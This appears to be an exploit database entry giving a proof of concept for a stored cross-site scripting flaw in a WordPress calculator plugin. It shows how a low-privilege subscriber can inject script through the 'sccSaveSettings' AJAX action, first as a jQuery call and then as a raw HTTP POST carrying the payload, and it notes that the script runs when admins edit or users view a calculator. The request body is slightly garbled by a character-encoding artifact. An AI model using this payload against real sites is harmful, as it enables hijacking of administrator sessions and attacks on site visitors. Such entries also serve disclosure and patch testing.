## https://sploitus.com/exploit?id=WPEX-ID:DB84A782-D4C8-4ABF-99EA-EA672A9B806E
As a subscriber:
jQuery.post(ajaxurl,{
action:"sccSaveSettings",
// This can XSS any page that uses the plugin's shortcode
currency_code:"EUR</script><script>alert(/XSS/)</script>",
currency_text:"Euro",
currency_style:"default"})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Connection: close
Cookie: [any authenticated user]
action=sccSaveSettings¤cy_code=EUR%3C%2Fscript%3E%3Cscript%3Ealert(/XSS/)%3C%2Fscript%3E¤cy_text=Euro¤cy_style=default
The XSS will be triggered when an admin will create/edit a Calculator, or when any user view a calculator embed in a page